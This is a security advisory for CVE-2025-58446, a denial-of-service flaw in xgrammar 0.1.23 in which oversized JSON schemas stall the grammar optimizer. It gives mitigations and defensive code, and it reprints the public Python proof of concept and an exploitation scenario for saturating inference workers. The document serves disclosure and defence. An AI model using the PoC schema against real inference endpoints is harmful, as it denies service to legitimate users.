CVE-2025-58446 — MEDIUM AI Security Vulnerability

CISO Take

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Risk Assessment

Effective risk is medium-high for exposed inference endpoints, despite the MEDIUM severity rating (no CVSS score has been assigned). The attack surface is any API that accepts caller-supplied JSON schemas for structured generation, a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires no AI/ML expertise to execute. The impact is on availability, not confidentiality: a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.
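As a rough illustration of throughput starvation, the sketch below counts the requests needed to keep every worker pinned for a given window. The function name, the worker count, and the 3-minute block time are hypothetical inputs rather than measurements, and the model assumes each malicious request occupies exactly one worker for the full block time.

```python
import math


def requests_to_saturate(workers: int, block_seconds: float, window_seconds: float) -> int:
    """Requests needed to keep all `workers` busy for `window_seconds`.

    Simplified model (an assumption): each malicious request pins exactly one
    worker for `block_seconds`, and the attacker resubmits as soon as one finishes.
    """
    if workers <= 0 or block_seconds <= 0:
        raise ValueError("workers and block_seconds must be positive")
    waves = math.ceil(window_seconds / block_seconds)  # back-to-back rounds per worker
    return workers * waves


if __name__ == "__main__":
    # Hypothetical deployment: 8 workers, each pinned for 3 minutes per request.
    per_hour = requests_to_saturate(workers=8, block_seconds=180, window_seconds=3600)
    print(per_hour, "requests/hour, one every", round(3600 / per_hour, 1), "s")
```

Under these assumptions, 8 workers pinned for 180 s each need only 160 requests per hour, about one every 22 seconds. Because the cost lands in grammar processing rather than in generated tokens, a rate that low can slip under token-based quotas, which is why per-client request limits are recommended independently of token limits.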

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
xgrammar	pip	`==0.1.23`	`0.1.24`

If you run xgrammar 0.1.23, you are affected; 0.1.24 and later are patched.
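One way to check a Python environment is to read the installed distribution version with the standard library's `importlib.metadata`. This is a minimal sketch: the helper names are hypothetical, it treats only the exact 0.1.23 release (ignoring a local `+...` suffix) as affected per the table above, and it does not detect copies of xgrammar vendored inside other packages.

```python
from importlib.metadata import PackageNotFoundError, version
from typing import Optional

# Per the advisory, only this release is vulnerable; 0.1.24 carries the fix.
VULNERABLE_RELEASES = {"0.1.23"}


def installed_xgrammar_version() -> Optional[str]:
    """Return the installed xgrammar version, or None if it is not installed."""
    try:
        return version("xgrammar")
    except PackageNotFoundError:
        return None


def xgrammar_is_affected(installed: Optional[str]) -> bool:
    """True if `installed` is the vulnerable release (a local '+...' suffix is ignored)."""
    if installed is None:
        return False
    public_version = installed.split("+", 1)[0]
    return public_version in VULNERABLE_RELEASES


if __name__ == "__main__":
    current = installed_xgrammar_version()
    if xgrammar_is_affected(current):
        print(f"xgrammar {current} is affected by CVE-2025-58446: upgrade to 0.1.24+")
    else:
        print(f"xgrammar {current or 'not installed'}: not the vulnerable release")
```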

Severity & Risk

CVSS 3.1: N/A (no score assigned yet)

EPSS: 0.1% (raw score 0.00091) chance of exploitation in the next 30 days, higher than 26% of all CVEs

Source: EPSS v3, FIRST.org

Exploitation Status

Exploit available: Yes
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation confidence: Medium
Signals: CISA SSVC reports a public PoC; a public PoC is indexed in trickest/cve.

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

1. **Patch**: Upgrade xgrammar to v0.1.24 or later. The fix speeds up the grammar optimizer and disables some slow optimizations for large grammars.
2. **Short-term workaround**: Enforce a maximum schema size (e.g., 50 KB) at the API gateway or application layer before calling Grammar.from_json_schema().
3. **Rate limiting**: Apply per-client rate limiting on constrained-generation endpoints, independent of token-based limits.
4. **Detection**: Alert when grammar parsing takes longer than 10 seconds; durations that long are anomalous and may indicate exploitation.
5. **Audit exposure**: Identify all internal services and APIs that accept caller-supplied JSON schemas and pass them to xgrammar without validation.
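The schema size limit and the slow-parsing alert can be combined in one wrapper around schema compilation. This is a sketch under assumptions: `guarded_compile`, `SchemaTooLarge`, and the threshold constants are hypothetical names, the values mirror the recommendations above, and the compiler is passed in as `compile_fn` so the guard does not depend on any particular xgrammar version.

```python
import json
import logging
import time
from typing import Any, Callable, TypeVar

logger = logging.getLogger("schema_guard")
T = TypeVar("T")

# Illustrative thresholds from the recommendations; tune for your deployment.
MAX_SCHEMA_BYTES = 50_000
SLOW_COMPILE_SECONDS = 10.0


class SchemaTooLarge(ValueError):
    """Raised when a caller-supplied schema exceeds the size limit."""


def guarded_compile(
    schema: Any,
    compile_fn: Callable[[str], T],
    max_bytes: int = MAX_SCHEMA_BYTES,
    slow_seconds: float = SLOW_COMPILE_SECONDS,
) -> T:
    """Reject oversized schemas, then compile and log a warning if compilation is slow."""
    # Serialize dicts so the size check measures the text the compiler receives.
    schema_text = schema if isinstance(schema, str) else json.dumps(schema)
    size = len(schema_text.encode("utf-8"))
    if size > max_bytes:
        raise SchemaTooLarge(f"schema is {size} bytes; limit is {max_bytes}")

    start = time.perf_counter()
    try:
        return compile_fn(schema_text)
    finally:
        # Runs whether compile_fn returned or raised; it cannot cancel a slow compile.
        elapsed = time.perf_counter() - start
        if elapsed > slow_seconds:
            logger.warning("grammar compilation took %.1f s for a %d-byte schema", elapsed, size)
```

With xgrammar, `compile_fn` could be `lambda s: xgr.Grammar.from_json_schema(s, strict_mode=True)`, mirroring the call in the PoC under Technical Details. The timing check only reports after compilation returns; it does not interrupt a compile that is already stalling a worker, so the size check and the upgrade remain the real defenses.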

CISA SSVC Assessment

Decision: Track*
Exploitation: PoC
Automatable: Yes
Technical Impact: Partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Tags: DoS, Inference Framework
AML.T0029 - Denial of AI Service
AML.T0034 - Cost Harvesting
AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.6 - AI system operation and monitoring
A.8.4 - AI system resources

NIST AI RMF

MANAGE-2.4 - Risks and benefits of the AI system are communicated to relevant AI actors
MEASURE-2.5 - AI system to be deployed satisfies its requirements for availability

OWASP LLM Top 10

LLM04 - Model Denial of Service (2023 edition; covered by LLM10 - Unbounded Consumption in the 2025 edition)

Frequently Asked Questions

Is CVE-2025-58446 actively exploited?

No active exploitation has been reported (EPSS is 0.00091), but proof-of-concept exploit code is publicly available, which lowers the bar for attackers.

What systems are affected by CVE-2025-58446?

This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.

What is the CVSS score for CVE-2025-58446?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

The provided grammar would fit in the context window of most models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine, so this seems to be a regression caused by the Earley parser.

### Details

A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and grammar parsing itself (with the models I checked) took significantly longer than LLM processing, meaning this can be used to DoS model providers.

### Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the one below. v0.1.24 solved this problem by speeding up the grammar optimizer and disabling some slow optimizations for large grammars. Thanks to @Seven-Streams

### PoC

```
import json
import random
import string

import xgrammar as xgr
# Private helper from xgrammar's test utilities (module path assumed).
from xgrammar.testing import _is_grammar_accept_string


def test_schema(schema, instance):
    # Compiling the schema into a grammar is the step that stalls on 0.1.23.
    grammar = xgr.Grammar.from_json_schema(json.dumps(schema), strict_mode=True)
    return _is_grammar_accept_string(grammar, json.dumps(instance))


def enum_schema(size=10000, str_len=10):
    # One enum of `size` random uppercase strings, referenced by eight properties.
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}
    schema = {
        "definitions": {"colorEnum": enum},
        "type": "object",
        "properties": {
            "color1": {"$ref": "#/definitions/colorEnum"},
            "color2": {"$ref": "#/definitions/colorEnum"},
            "color3": {"$ref": "#/definitions/colorEnum"},
            "color4": {"$ref": "#/definitions/colorEnum"},
            "color5": {"$ref": "#/definitions/colorEnum"},
            "color6": {"$ref": "#/definitions/colorEnum"},
            "color7": {"$ref": "#/definitions/colorEnum"},
            "color8": {"$ref": "#/definitions/colorEnum"},
        },
        "required": ["color1", "color2"],
    }
    return schema


schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

### Impact

DoS
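The PoC schema's size follows from simple arithmetic: `json.dumps` wraps each 10-letter value in two quotes and joins values with `", "`, so each value costs 14 characters and the default 10,000-value enum alone comes to 140,000 characters. The sketch below checks that formula against `json.dumps`, using a fixed uppercase string in place of the PoC's random ones (the length is the same either way); the helper names are hypothetical. Schema text length is only a rough proxy for the grammar size the advisory refers to.

```python
import json


def enum_array_chars(count: int, value_len: int) -> int:
    """Predicted length of json.dumps() output for `count` ASCII strings of `value_len` chars.

    Each value costs value_len + 2 (quotes) + 2 (the ", " separator). The last
    value has no separator, but the surrounding "[" and "]" add those 2 back.
    """
    if count == 0:
        return 2  # json.dumps([]) == "[]"
    return count * (value_len + 4)


def measured_enum_array_chars(count: int, value_len: int) -> int:
    """Measure the same quantity directly with a fixed uppercase value."""
    return len(json.dumps(["A" * value_len] * count))


if __name__ == "__main__":
    for n in (1_000, 3_571, 10_000):
        print(n, enum_array_chars(n, 10), measured_enum_array_chars(n, 10))
```

At 14 characters per value, a 50,000-byte cap admits at most 3,571 such values in one enum (fewer once the rest of the schema is counted). The advisory does not say exactly where the slowdown starts, so treat a size cap as a heuristic rather than a guarantee.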

Exploitation Scenario

An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters, trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs the attacker almost nothing and needs only ordinary API access: no authentication bypass or specialized knowledge, just awareness of the library version and the public PoC.
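The scenario depends on one client holding several workers at once, which per-client rate limiting on constrained-generation requests is meant to prevent. Below is a minimal token-bucket sketch; `PerClientRateLimiter`, the `client_id` key, and the default capacity and refill rate are illustrative assumptions, and the clock is injectable so the behavior can be tested deterministically.

```python
import time
from dataclasses import dataclass, field
from typing import Callable, Dict


@dataclass
class _Bucket:
    tokens: float
    updated: float


@dataclass
class PerClientRateLimiter:
    """Token bucket per client for schema-bearing (constrained-generation) requests.

    Not thread-safe as written; guard `allow` with a lock in a concurrent server.
    """

    capacity: float = 2.0  # burst: schema requests a client may send at once
    refill_per_sec: float = 1.0 / 60.0  # sustained rate: one per minute (illustrative)
    clock: Callable[[], float] = time.monotonic
    _buckets: Dict[str, _Bucket] = field(default_factory=dict, init=False, repr=False)

    def allow(self, client_id: str) -> bool:
        """Consume one token for `client_id`; return False if none is available."""
        now = self.clock()
        bucket = self._buckets.get(client_id)
        if bucket is None:
            # New clients start with a full bucket.
            bucket = _Bucket(tokens=self.capacity, updated=now)
            self._buckets[client_id] = bucket
        # Refill in proportion to elapsed time, never above capacity.
        bucket.tokens = min(self.capacity, bucket.tokens + (now - bucket.updated) * self.refill_per_sec)
        bucket.updated = now
        if bucket.tokens >= 1.0:
            bucket.tokens -= 1.0
            return True
        return False
```

Call `allow(client_id)` before accepting any request that carries a JSON schema, and reject it (e.g., with HTTP 429) when it returns False. A limiter like this bounds what one client can do; it does not stop many clients acting together, so it complements the upgrade rather than replacing it.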